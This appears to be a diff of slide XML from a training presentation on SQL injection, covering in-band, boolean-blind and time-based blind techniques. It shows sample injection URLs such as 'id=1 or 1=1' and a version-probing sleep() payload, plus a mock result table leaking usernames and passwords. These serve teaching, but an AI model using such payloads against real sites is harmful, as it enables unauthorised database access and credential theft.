-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| product             | stockcount    |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Model Car           | 342           |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| vortex              | password1     |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| syn0                | synisgod      |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| vputin              | ilovetrump    |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Enter a single </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>quote, and see </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>what happens.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="94" name="CustomShape 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3657600" y="4480560"/>
+            <a:ext cx="5486400" cy="1371600"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Error </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>displa</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>yed?</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>HTTP </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Respon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>se </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>500?</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Item </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Not </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Found?</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="9" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="10" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -5107,14 +5591,54 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="93" name="CustomShape 1"/>
+          <p:cNvPr id="95" name="TextShape 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="182880" y="217080"/>
+            <a:ext cx="1552320" cy="331560"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>In-Band SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="96" name="CustomShape 2"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="182880" y="182880"/>
-            <a:ext cx="1671480" cy="364320"/>
+            <a:off x="3017880" y="640080"/>
+            <a:ext cx="6491880" cy="601920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5131,39 +5655,49 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>Blind SQLi</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="94" name="TextShape 2"/>
-          <p:cNvSpPr txBox="1"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>In-band; where the results are </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>returned in the response</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="97" name="CustomShape 3"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="5212080" y="766080"/>
-            <a:ext cx="1828800" cy="331200"/>
+            <a:off x="2560320" y="3512880"/>
+            <a:ext cx="7406640" cy="601920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5173,37 +5707,57 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Boolean blind</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="95" name="TextShape 3"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1+and+1=1</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>select product, stockcount from products where id = 1 or 1=1</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="98" name="CustomShape 4"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="5029200" y="3417840"/>
-            <a:ext cx="2011680" cy="331200"/>
+            <a:off x="3749040" y="4206240"/>
+            <a:ext cx="4754520" cy="2016720"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5213,37 +5767,180 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Time based blind</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="96" name="TextShape 4"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| product             | stockcount    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| Model Car           | 342           |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| Model Boat          | 43            |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| Model Plane         | 542           |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| Model Drone         | 43            |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="99" name="CustomShape 5"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3749040" y="1226520"/>
-            <a:ext cx="4480560" cy="602280"/>
+            <a:off x="3111120" y="1226880"/>
+            <a:ext cx="6464880" cy="601920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5253,37 +5950,57 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1 and 1=1 (TRUE)</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="97" name="TextShape 5"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>select product, stockcount from products where id = 1 </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="100" name="CustomShape 6"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3749040" y="1737360"/>
-            <a:ext cx="4846320" cy="602280"/>
+            <a:off x="3749040" y="1828800"/>
+            <a:ext cx="4754520" cy="1559520"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5293,117 +6010,106 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1 and 1=2 (FALSE)</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="98" name="TextShape 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="4124880"/>
-            <a:ext cx="8321040" cy="812880"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1 and if(mid(version(),1,1) = '5', sleep(15), 0) </a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
